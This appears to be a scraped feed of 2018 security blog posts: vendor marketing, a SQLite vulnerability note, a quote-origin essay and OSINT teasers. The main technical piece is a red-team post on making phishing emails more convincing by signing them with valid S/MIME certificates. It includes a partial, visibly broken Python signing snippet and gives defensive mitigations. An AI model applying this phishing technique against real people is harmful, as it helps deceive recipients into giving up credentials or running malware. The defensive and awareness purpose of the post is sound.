Often the organisation can’t justify having a full blown operating system and sophisticated defence tools on these systems, especially when they have a large number of them deployed out in the field, accessing bespoke or online applications. Often they are in widely geographically dispersed locations which means there are significant costs to go out and update, maintain, manage and fix them.

Likewise, organisations don’t always have the local IT resource in many of these locations to maintain the equipment and its security themselves.

Whilst a light is currently being shone on Marriott, perhaps our concerns should be far broader. If the issues are systemic, we need to think about how better security is built into the systems and supply chains we use by default, rather than expecting hotels or similar organisations in other industries to be sufficiently expert. Is it the hotel, as the end user that should be in the headlines, or how standards, expectations and regulations apply to the ecosystem that surrounds the leisure and other industries? Or should the focus be on how this needs to be improved in order to allow businesses to focus on what they do best, without being quite such easy prey?

CEO and co-founder of Becrypt

McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some noticeable statistics jump out of the report.  In particular, the continued rise in cryptojacking, which has made an unexpected emergence over the course of a year. In Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats included one notable introduction in a disturbing category. In Q3 we saw two new exploit kits: Fallout and Underminer. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to easily and cheaply enter the digital crime business.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

Personality May Determine Employee Engagement

Interesting insights from the HBR, like emphasizing positive personalities in the workforce can harm leadership feedback loops: If leaders turn employee optimism and resilience into a key hiring criterion, then it becomes much harder to spot and fix leadership or cultural issues using employee feedback signals. And then they double-down on this assessment of overly … Continue reading Personality May Determine Employee Engagement

Mobile Application Security Assessments: The Best Practices to Launch and Maintain a Secure App

Are you considering a mobile app security assessment? Discover the top 5 ways apps are compromised and the main types of testing and best practices moving forward.


Information Security
Risk Management

Are you considering a mobile app security assessment? Check out the basics. Quickly learn why it is important, discover the top 5 ways apps are compromised, and the main types of testing and best practices moving forward.

SQLite Vulnerability May Be Putting Your Applications at Risk

Late last week, Tencent announced that researchers from its Blade Team had discovered a remote code execution (RCE) vulnerability in SQLite, dubbed Magellan. SQLite is a very popular embedded SQL server. It is one of the components inside many thousands of applications, including the Google Chromium browser. Google has since updated Chromium to contain the fixed version of SQLite, version 3.26.0, released on December 1. Although there are no reports of the vulnerability being executed in the wild, a situation where a high-impact vulnerability is found in a component that is in widespread use is usually a cause for alarm. This case, however, has some mitigating circumstances that will keep this from being another Heartbleed-size problem.

As discussed in previous posts, when we look at vulnerabilities in open source components, we need to distinguish between a component that contains a vulnerability and how that component is used by an application. Every development team that embedded SQLite needs to be doing this right now. It turns out that for an attacker to exploit this particular vulnerability in an application, they need to be able to manipulate queries that the application makes to SQLite. Chromium implements Web SQL, which allows an attacker to create a web page that will send SQL commands to the embedded SQLite code – thus making it vulnerable. If your application allows user input to construct SQL queries, then your application is likely vulnerable, too.

There are other situations where your application may be vulnerable. Allowing attackers to construct SQL queries sounds a lot like a SQL injection vulnerability.  If your app does have a SQLi vulnerability, you may now have a bigger problem with a far more serious RCE vulnerability if you’re using an outdated version of SQLite. If you’re using application security testing techniques, including SAST, DAST, and manual penetration testing and fixing issues found as a part of your development process, you may feel confident that your apps don’t have any SQLi vulnerabilities. Whether or not you have an AppSec program in place, the best thing that development teams can do is update to the latest version of SQLite.

This is true any time you determine that your application uses a component with a known vulnerability, and updating does not need to be a fire drill. Software composition analysis (SCA) can look at the open source code in your app and tell you if there are known vulnerabilities and if a vulnerable method is being called. Veracode’s SCA product uses control flow analysis to do this quickly, without a manual inspection of the components in use. If you find that your application or applications are not vulnerable, you can wait until there is a convenient time to update the component so that keeping current isn’t disruptive to your development schedule.

To learn more about how Veracode can help mitigate your organization’s open source risk, download our whitepaper:

McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention

I am excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention. I believe our position as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention is a testament that our device-to-cloud DLP integration of enterprise products helps our customers stay on top of evolving security needs, with solutions that are simple, flexible, comprehensive and fast, so that our customers can act decisively and mitigate risks. McAfee takes great pride in being recognized by our customers on Gartner Peers Insights.

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, considering both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.




For this distinction, a vendor must have a minimum of 50 published reviews with an average overall rating of 4.2 stars or higher during the sourcing period. McAfee met these criteria for McAfee Data Loss Prevention.

Here are some excerpts from customers that contributed to the distinction:

“McAfee DLP Rocks! Easy to implement, easy to administer, pretty robust”

Security and Privacy Manager in the Services Industry

“Flexible solution. Being able to rapidly deploy additional Discover systems as needed as the company expanded was a huge time saving. Being able to then recover the resources while still being able to complete weekly delta discovery on new files being added or changed saved us tens of thousands of dollars quarterly.”

IT Security Manager in the Finance Industry

“McAfee DLP Endpoint runs smoothly even in limited resource environments and it supports multiple platforms like windows and mac-OS. Covers all major vectors of data leakages such as emails, cloud uploads, web postings and removable media file sharing.”

Knowledge Specialist in the Communication Industry

“McAfee DLP (Host and Network) are integrated and provide a simplified approach to rule development and uniform deployment.”

IT Security Engineer in the Finance Industry

 “Using ePO, it’s easy to deploy and manage the devices with different policies.”

Cyber Security Engineer in the Communication Industry


And those are just a few. You can read more reviews for McAfee Data Loss Prevention on the Gartner site.

On behalf of McAfee, I would like to thank all of our customers who took the time to share their experiences. We are honored to be a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention and we know that it is your valuable feedback that made it possible. To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice.


  • Gartner Peer Insights’ Customers’ Choice announcement December 17, 2018
The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention appeared first on McAfee Blogs.

The Origin of the Quote "There Are Two Types of Companies"

While listening to a webcast this morning, I heard the speaker mention

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

He credited Cisco CEO John Chambers but didn't provide any source.

That didn't sound right to me. I could think of two possible antecedents. so I did some research. I confirmed my memory and would like to present what I found here.

John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

We see that the first is a version of what Mr Chambers said. Let's call that 2-KNOW. The second is different. Let's call that 2-BE.

The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world's biggest firms, there are just two kinds: those that know they've been compromised, and those that still haven't realized they've been compromised.

Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced question 2-BE into the lexicon, plus a little more:

For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. 

And even they are converging into one category: companies that have been hacked and will be hacked again.  

Here we see Mr Mueller morphing Dmitri's quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant -- "companies that have been hacked and will be hacked again." Let's call this version 2-AGAIN.

The very beginning of Mr Mueller's quote is surely a play on Kevin Mandia's long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the "two companies" language.

One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

Finally, there's a fourth version introduced by Mr Mueller's successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company Mr Comey said:

Speaking to CBS' 60 Minutes, James Comey had the following to say on Chinese hackers: 

There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.

Let's call this last variant 2-CHINA.

To summarize, there are four versions of the "two companies" quote:

  • 2-KNOW, credited to Dmitri Alperovitch in 2011, says "There are only two types of companies—those that know they’ve been compromised, and those that don’t know."
  • 2-BE, credited to Robert Mueller in 2012, says "[T]here are only two types of companies: those that have been hacked and those that will be."
  • 2-AGAIN, credited to Robert Mueller in 2012, says "[There are only two types of companies:] companies that have been hacked and will be hacked again."
  • 2-CHINA, credited to James Comey in 2014, says "There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese."
Now you know!

Giving Your Endpoint the Gift of Security This Holiday Season

Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer, it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive fun to find vulnerabilities and infect unsecured devices. And with many employees out of office, these hackers could potentially pose a serious threat to an organization’s endpoints, and thereby its network. As a matter of fact, there are a few key reasons as to why your organization’s endpoints may be in danger during the holidays. Let’s take a look.

Business Shutdowns

Most companies close down for a handful of days during the holidays, if not a full week or two. That means less people manning the IT station, executing updates, and defending the network if cybercriminals manage to find a way inside. A lack of personnel could be just the opportunity cybercriminals need to take advantage of an open entry point and swoop data from an organization essentially undetected.

Holiday Spirit, Relaxed Attitude

For the employees that do stay online during the holidays, attitudes can range from relaxed to inattentive. Unless their product or service directly relates to the holidays and shopping, businesses tend to be quiet during this time. And with many coworkers out, employees tend to have less reason to be glued to their computer all the time. This could mean cyberattacks or necessary security actions go unattended – irregular activity may not seem as obvious or a necessary software update could go unresolved a little too long. What’s more – the lax attitude could potentially lead to a successful phishing attack. In fact, phishing scams are said to ramp up starting in October, as these cybercriminals are eager to time their tricks with the holiday season. In order to accurately identify a phishing scheme, users have to be aware and have their eyes on their inbox at all times. One false move could potentially expose the entire organization, creating a huge problem for the reduced staff on hand.

Holiday Travel = Public Wi-Fi

Workplace mobility is a great new aspect of the modern age – it permits employees more flexibility and allows them to work from essentially anywhere in the world. But if employees are working out of a public space – such as a coffee shop or an airport – they are likely using public Wi-Fi, which is one of the most common attack vectors for cybercriminals today. That’s because there are flaws in the encryption standards that secure Wi-Fi networks and cybercriminals can leverage these to hack into a network and intercept or infect users’ traffic. If an employee is traveling home for the holidays and using public Wi-Fi to get work done while they do, they could potentially expose any private company information that lies within their device.

BYOD in Full Force

Speaking of modern workplace policies, Bring Your Own Device (or BYOD) – a program that allows employees to bring their own personal devices into work – is a common phenomenon these days. With this program, employees’ personal devices connect to the business’ network to work and likely access company data.

That means there is crucial data living on these personal devices, which could be jeopardized when the devices travel outside of the organization. With the holidays, these devices are likely accompanying the employees on their way to visit family, which means they could be left at an airport or hotel. Beyond that, these employees are more likely to access emails and company data through these mobile devices while they are out of the office. And with more connected devices doing company business, there are simply more chances for device and/or data theft.

Staying Secure While Staying Festive

Now, no one wants their employees to be online all the time during the holidays. Fortunately, there are actions organizations can take to ensure their employees and their network are merry and bright, as well as secure. First and foremost, conduct some necessary security training. Put every employee through security training courses so they’re aware of the risks of public Wi-Fi and are reminded to be extra vigilant of phishing emails during this time. Then, make sure all holes are patched and every update has been made before everyone turns their attention to yuletide festivities. Lastly, if an employee is working remotely – remind them to always use a VPN.

No matter who’s in the office and who’s not, it’s important to have always-on security that is armed for the latest zero-day exploits – like McAfee Endpoint Security. You can’t prevent every user from connecting to a public network or one that is set up for phishing, but you can ensure they have an active defense that takes automatic corrective actions. That way, employees can enjoy the time off and return to a safe and secure enterprise come the new year.

To learn more about endpoint security and McAfee’s strategies for it, be sure to follow us at @McAfee and @McAfee_Business.


The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

What CES Can Show Us About Evolving Consumer Security Needs: A Timeline

Appropriately dubbed the ‘Global Stage for Innovation,’ it’s no wonder CES showcases the most cutting-edge consumer technologies coming out in the year ahead. No topic is off the table; Attendees will learn more about connected homes, smart cities and self-driving cars, try out shiny new digital health wearables, headsets, and other connected tech, explore AI-driven technologies, and so much more.

Although events like CES showcase breakthrough technologies, interestingly, they also highlight how rapidly new technology is replaced with the next new thing. The rate at which we are treading on new ground is shifting exponentially, and what we see at CES this January might be obsolete in just a few years.

This rapidly changing technological landscape poses a significant predicament to consumers, a ‘digital dilemma’ if you will: as new technologies accelerate and IoT devices that house them progress, new challenges arise with them. This is particularly the case when it comes to security and privacy. And, just as security and products change and adapt, so do our needs and wants as consumers. Those of a teen differ from those of a parent, from those of a baby boomer, and so on. Let’s see how those needs change over time.

A Digital Life Timeline

2015: The Teen Technologist

Born in the late ‘90s, this teen is an everyday gamer, who loves to play games online with friends. They also love their smartphone, mostly for the access to social media. A teen wouldn’t necessarily be concerned with security, so having a comprehensive system built in is crucial.

2021: The Young Professional

Entering the workforce for the first time, the young professional is finally able to buy the gadgets that were once luxuries. They might have two phones; one for work and a personal device. Additionally, they are bringing more connected devices into their home, so the need for a secure home network has become obvious. They are also always on the go and having to connect to public Wi-Fi, so a Virtual Private Network (VPN) should be considered.

2032: The Concerned Parent

Fast forward almost ten years, the young professional has become a worrying parent. Their kids are spending too much time on screens. Having a way to monitor what they are doing on the internet and limit their time online is crucial, and an application that could  provide parental controls would be welcomed. Also, as they bring larger, more connected devices into the home, like smart refrigerators and thermostats, they are excited about a platform that will bake in security through a home network.

2038: The Brand Loyalists

The concerned parent has found devices they like and those they do not like. But more importantly, they have found brands they love, and they may continue to purchase from to bring the latest technology into their family’s lives. A comprehensive security system that covers all types of devices is exactly what they would need to keep a layer of protection

2045: The Unacquainted User

At this point in a digital journey, our user has stopped keeping up with trends because things have changed so much. Almost to the point where they are unwilling to learn new tech, or are untrusting of it all together. But the need to maintain their security and privacy is still top of mind –especially as cybercriminals often prey on this demographic due to being an easy target. A person like this might worry about ransomware, viruses, and identity theft along with protecting their home network.

As you can see, a person’s security and safety needs, desires, and even their devices evolve depending on the moment in which they are within their life. With so much in flux, the last thing anyone wants to think about is security – but with constantly changing technology at an all-time high, it’s safe to bet that threats will evolve to keep pace, and so should the ways in which we protect devices. For these reasons, it’s important to leverage a security partner that will keep this in mind, and will grow with not only our evolving needs, but evolving technology, too.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post What CES Can Show Us About Evolving Consumer Security Needs: A Timeline appeared first on McAfee Blogs.

Your trust, our signature

Written and researched by Mark Bregman and Rindert Kramer

Sending signed phishing emails

Every organisation, whatever its size, will encounter phishing emails sooner or later. While the number of phishing attacks is increasing every day, the way in which phishing is used within a cyber-attack has not changed: an attacker comes up with a scenario which looks credible enough to persuade the target to perform a certain action like opening an attachment or clicking on a link in the email. To avoid such attacks the IT or security team will tell users to check for certain things to avoid falling for these phishing emails. One of the recommendations is to check if the email is digitally signed with a valid certificate. However, in this blog, we present an attack that abuses this recommendation to regain the recipient’s trust in the sender.

Traditional phishing

Countless organizations have fallen victim to traditional phishing attacks where the attacker tries to obtain credentials or to infect a computer within the target network. Phishing is a safe way to obtain such footholds for an attacker. The attacker can just send the emails, sit back and wait for the targets to start clicking.

At Fox-IT we receive lots of requests to run simulated phishing attacks; so our team sends out hundreds of thousands of carefully crafted emails every year to clients to simulate phishing campaigns. Whether it’s a blanket campaign against the entire staff or a spear phishing one against targeted individuals, the big issue with phishing stays the same; we need to persuade one person to follow our instructions. We are looking for the weakest link. Sometimes that is easy, sometimes not so much. But an attacker has all the time in the world. If there is no success today, then maybe tomorrow, or the day after…
To create security awareness among employees, IT or the security team will tell their users to take a close look at a wide variety of things upon receiving emails. Some say you have to check for spelling mistakes, others say you have to be careful when you receive an email that tries to force you to do something (“Change your password immediately, or you will lose your files”), or when something is promised (“Please fill in this survey and enter the raffle to win a new iPhone”).

SPF records

Some will tell their users to check the domain that sent the email. But others might argue that anyone can send an email from an arbitrary domain; what’s known as ‘email spoofing’.

Wikipedia defines this as:

Email spoofing is the creation of email messages with a forged sender address. Because the core email protocols do not have any mechanism for authentication, it is common for spam and phishing emails to use such spoofing to mislead the recipient about the origin of the message.

— Wikipedia

This means that an email originating from the domain “ ”, may not have been sent by an employee of Fox-IT. This can be mitigated by implementing Sender Policy Framework (SPF) records. In an SPF record you specify which email servers are allowed to send emails on behalf of your domain. If an email originating from the domain “ ” was not sent by the email server specified in the SPF record, the email message can be flagged as SPAM. By using SPF records you know that the email was sent by an authorized email server, SPF records however, do not disclose the authenticity of the sender. If a company has configured their SMTP server as an open relay server, users can send mail on another user’s behalf which will pass the SPF record check on the receivers end. There are other measures that can be used to identify legitimate mail servers to reduce phishing attacks, such as DKIM and DMARC, however, these are beyond the scope of this blogpost.

What is a digital signature?

To tackle the problem of email spoofing some organizations sign their emails with a digital signature. This can be added to an email to give the recipient the ability to validate the sender as well as the integrity of the email message.
For now we’ll focus on the aspect of validating the sender rather than the message integrity aspect. When the email client receives a signed email, it will check the attached certificate to see who the subject of the certificate is (i.e.: “ “). The client will check if this matches the originating email-address. To verify the authenticity of the digital signature, the email client will also check if the certificate is issued (signed) by a reputable Certificate Authority (CA). If the certificate is signed by a trusted Certificate Authority, the receiving email client will tell the recipient that the email is signed using a valid certificate. Most email clients will in this case show a green checkmark or a red rosette, like the one in the image below.


By default there is a set of trusted Certificate Authorities in the Windows certificate store. With digital certificates, everything is based on trusting those third parties, the Certificate Authorities. So we trust that the Certificate Authorities in our Windows certificate store give out certificates only after verifying that the certificate subject (i.e.: “ “) is who they say they are. If we receive a signed email with a certificate which is verified by one of the Certificate Authorities we trust, our systems will tell us that the origin of the email is trusted and validated.
Obviously the opposite is also true. If you receive a signed email and the attached certificate is not signed by a Certificate Authority which is in the Windows certificate store, then the signature will be considered invalid. It is possible to attach a self-signed certificate to an email; in which case the email will be signed, but the receiving email client won’t be able to validate the authenticity of the received certificate and therefore will show a warning message to the recipient.


Common misconception regarding email signing

Some IT teams are pushing email signing as the Holy Grail to avoid being caught by a phishing email, because it verifies the sender. And if the sender is verified, we have nothing to worry about.

Unfortunately, the green checkmark or the red rosette which accompanies a validated email signature seems to stimulate the same behavior as we’ve seen with the green padlock accompanying HTTPS websites. Users see the green padlock in their browser and think that the website is absolutely safe. Similarly, they see the green checkmark or the red rosette and make the assumption that everything is safe: it’s a signed email with a valid certificate, the sender is verified, which means everything must be OK and that the email can’t be a phishing attack.

This may be true, if sends you a signed email with a valid certificate: the sender really is Alice from Fox-IT, provided that the private key of the certificate is not compromised. But, if (notice the ‘.cm’ instead of ‘.com’) sends you a signed email with a valid certificate, that person can still be anyone. As long as that person has control over the domain ‘’, they will be able to send signed emails from that domain. Because many users are told that the green checkmark or the red rosette protects against phishing, they may be caught off guard if they receive an email containing a valid certificate.

Sending signed phishing emails

At Fox-IT we’re always trying to innovate, meaning in this case that we’re looking for ways to make the phishing emails in our simulations more appealing to our client’s employees. Adding a valid certificate makes them look genuine and creates a sense of trust. So when running phishing simulations we use virtual private servers to do the job. For each simulation we setup a fresh server with the required configuration in order to deliver the best possible phishing email. To send out the emails, we’ve developed a Python script into which we can feed a template, some variables and a target list. Recently we’ve updated the script to include the ability to sign our phishing emails. This results in very convincing phishing emails. For example, in Microsoft Office Outlook one of our phishing emails would look like this:


This is not limited to Office Outlook only, it is working in other mail clients as well, such as Lotus Notes. Although Lotus Notes doesn’t have a red rosette to show the user that an email is digitally signed, there are some indicators which are present when reading a signed email. As you can see below, the digital signature does still add to the legitimate look of the phishing emails:


Going the extra mile

The user has now received a phishing mail that was signed with a legitimate certificate. To make it look even more genuine, we can mention the certificate in the phishing mail. Since the Dutch government has a webpage1 with information about the use of electronic signatures in email, we can write a paragraph that looks something like the the one in the image below.


Sign the email

The following (Python) code snippet shows the main signing functionality:

# Import the necessary classes from M2Crypto library
from M2Crypto import bio, rand, smime

# Make a MemoryBuffer of the message.
buf = makebuf(msg_str)

# Seed the PRNG.
Rand.load_file('randpool.dat', -1)

# Instantiate an SMIME object; set it up; sign the buffer.
s.load_key('key.pem', 'cert.pem')
p7 = s.sign(buf, SMIME.PKCS7_DETACHED)

# Recreate buf.
buf = makebuf(msg_str)

# Output p7 in mail-friendly format.
out = BIO.MemoryBuffer()
out.write('From: %s\n' % sender)
out.write('To: %s\n' % target)
out.write('Subject: %s\n' % subject)

s.write(out, p7, buf)
msg =

# Save the PRNG's state.

This code originates from the Python M2Crypto documentation2

For the above code to work, the following files must be in the same directory as the Python script:
* The public certificate saved as cert.pem
* The private key saved as key.pem

There are many Certificate Authorities that allow you to obtain a certificate online. Some even allow you to request a certificate for your email address for free. A quick google query for “free email certificate” should give you enough results to start requesting your own certificate. If you have access to an inbox you’re good to go.
To get an idea of how the above code snippet can be included in a standalone script, we’d like to refer to Fox-IT’s Github page where we’ve uploaded an example script which takes the most basic email parameters (‘from’, ‘to’, ‘subject’ and ‘body’). Don’t forget to place the required certificate and corresponding key file in the same directory with the Python script if you start playing around with the example script. Link to project on GitHub:


There are some mitigations that can make this type of attack harder to perform for an attacker. We’d like to give you some tips to help protect your organisation.

Prevent domain squatting

The first mitigation is to register domains that look like your own domain. An attacker that sends a phishing mail from a domain name that is similar to your own domain name can trick users into executing malware or giving away their credentials more easily. This type of attack is called domain squatting, which can result in examples like instead of . There are generators that can help you with that, such as:

Restrict Enhanced Key Usages

Another mitigation has a more technical approach. For that we need to look into how certificates are used. Let’s say we have an internal Public Key Infrastructure (PKI) with the following components:
* Root CA
* Subordinate CA

The root CA is an important server in an organisation for maintaining integrity and secrecy. All non-public certificates will stem from this server. Most organizations choose to completely isolate their root CA for that reason and use another server, the subordinate CA, to sign certificate requests; The subordinate CA will sign certificates on behalf of the root CA.
In Windows, the certificate of the root CA is stored in the Trusted Root Certification Authorities store, while the certificate of the subordinate CA is stored in the Intermediate Certification Authorities store.

Certificates can be used in many scenarios, for example:
* If you want to encrypt files, you can use Encrypted File System (EFS) in Windows. EFS uses a certificate to protect your data from prying eyes.
* If you have a web server, you can use a certificate to establish a secure connection with a client so that all data is transferred securely.
* Stating the obvious: if you want to send email in a secure way, you can also use a certificate to achieve that

Not every certificate can sign code, encrypt files or send email securely. Certificates have a property, the Enhanced Key Usage (EKU), that states the intended purpose of a certificate. The intended purpose can be one of the actions mentioned above, or a wildcard. A certificate with only an EKU for code signing cannot be used to send email in a secure manner.

By disabling the “Secure Email” EKU from all certification authorities, except from our own root and subordinate CA, phishing mail that is signed with a valid certificate signed by a third party CA, will still trigger a warning stating that the certificate is invalid.
To do that, we must first discover all certificates that support the secure email EKU. This can be done with the following PowerShell one-liner:

# Select all certificates where the EnhancedKeyUsage is empty (Intended Purpose -eq All)
# or where EnhancedKeyUsage contains Secure Email
Get-ChildItem -Path 'Cert:\' -Recurse | Where-Object {$_.GetType().Name -eq 'X509Certificate2' -and ({$_.EnhancedKeyUsageList.Count -eq 0} -or $_.EnhancedKeyUsageList.FriendlyName -contains 'Secure Email')} | Select-Object PSParentPath, Subject

We now know which certificates support the secure email EKU. In order to disable to secure email EKU we have to do some manual labour. It is recommended to apply the following in a base image, group policy or certificate template.

  1. Run mmc with administrative privileges
  2. Go to File, Add or Remove Snap-ins, select Certificates
  3. Select My user account, followed by OK. Please note that this mitigation requires that certificates in all certificates stores must be edited.

    1. Check if intended purpose states Secure email or All
  4. Open the properties of a certificate and click the details tab

If the intended purpose at step 3.1 stated All,
1. Click Key Usage, followed by Edit Properties.
2. Click Enable only the following purposes and uncheck the Secure Email checkbox

If the intended purpose at step 3a stated Secure Email,
1. Click Enhanded key usage (property)
2. Click Edit Properties…
3. Uncheck the Secure Email checkbox

Please keep the following in mind when implementing these mitigations:
* When a legitimate mail has been signed with with a certificate issues by a CA that of which the Secure Email EKU has been removed, the certificate of the email will not be trusted by Windows
* Changing the EKU may have an impact on the working of your systems
* These settings can be reverted with every update in Windows
* New or renewed certificates can have the Secure email EKU as well

This means that in order to only allow your own PKI server to have the Secure Email EKU enabled you must periodically check for certificates that have this EKU configured.

Human factor

With techniques like the one described in this blog post it becomes more and more obvious that users will never be able to withstand social engineering attacks. In a best case scenario, users will detect and report an attack, in a worst case scenario your users will become victim. It is important to perform awareness exercises and educate users, but we should accept that a percentage of the user base could always become a victim. This means that we (organizations) need to start thinking about new and more user friendly strategies in combating these type of attacks.

To summerize this blogpost:
* An email coming from a domain does not prove the integrity of the sender
* An email that is signed with a trusted and legitimate certificate does not mean that the email can be trusted
* If the domain of the sender address is correct and the email has been signed with a valid certificate signed by a trusted CA, only then the email can be trusted.


1: (Dutch)
2: “M2Crypto S/MIME”

VirusTotal += Acronis

We welcome Acronis scanner to VirusTotal. In the words of the company:

“Acronis PE analyzer is Machine Learning based engine to be a part of upcoming cyber protection suite that company will release in 2019. It is a further evolution of Acronis AI capabilities that were introduced in 2018 to combat ransomware. PE analyzer is able to detect any kind of windows PE malware due to optimized innovative machine learning models. Acronis has plans to continuously improve the engine before and after the release of above mentioned cyber protection suite to bring value to all VirusTotal users.”

Acronis has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-TEST, an AMTSO-member tester.

Pay-Per-Exploit Acquisition Vulnerability Programs – Pros and cons?

As ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems software and/or devices a logical question emerges in the context of the program's usefulness the potential benefits including potential vulnerabilities within the actual acquisition process - how would the program undermine the

HIstorical OSINT – Malicious Economies of Scale – The Emergence of Efficient Platforms for Exploitation – 2007

Dear blog readers it's been several years since I last posted a quality update following my 2010 disappearance. As it's been quite a significant period of time since I last posted a quality update I feel it's about time I post an quality update by detailing the Web Malware Exploitation market segment circa 2007 prior to my visit to the GCHQ as an independent contractor with the Honeynet Project.

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO campaign successfully enticing hundreds of thousands globally into interacting with a multi-tude of rogue and malicious software also known as scareware. In this post I'll profile the campaign discuss in-depth the tactics techniques and procedures of the cybercriminals behind it and

Historical OSINT – A Diversified Portfolio of Fake Security Software Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of fake security software also known as scareware potentially exposing hundreds of thousands of users to a variety of fake security software with the cybercriminals behind the campaign potentially earning fraudulent revenue largely relying on the utilization of an affiliate-network

Historical OSINT – A Diversified Portfolio of Fake Security Software

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent porfolio of fake security software also known as scareware potentially enticing hundreds of thousands of users to a multi-tude of malicious software with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2008 and I've recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim into fake security software also known as scareware including a variety of dropped fake codecs largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns in this particular case various North Korea news

Historical OSINT – Spamvertized Swine Flu Domains – Part Two

It's 2010 and I've recently came across to a currently active diverse portfolio of Swine Flu related domains further enticing users into interacting with rogue and malicious content. In this post I'll profile and expose a currently active malicious domains portfolio currently circulating in the wild successfully involved in an ongoing variety of Swine Flu malicious spam campaigns and will

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2010 and I've recently came across to a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns. In this post I'll provide actionable intelligence on the infrastructure behind the campaign. Related malicious domains known to have participated in the campaign:

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild

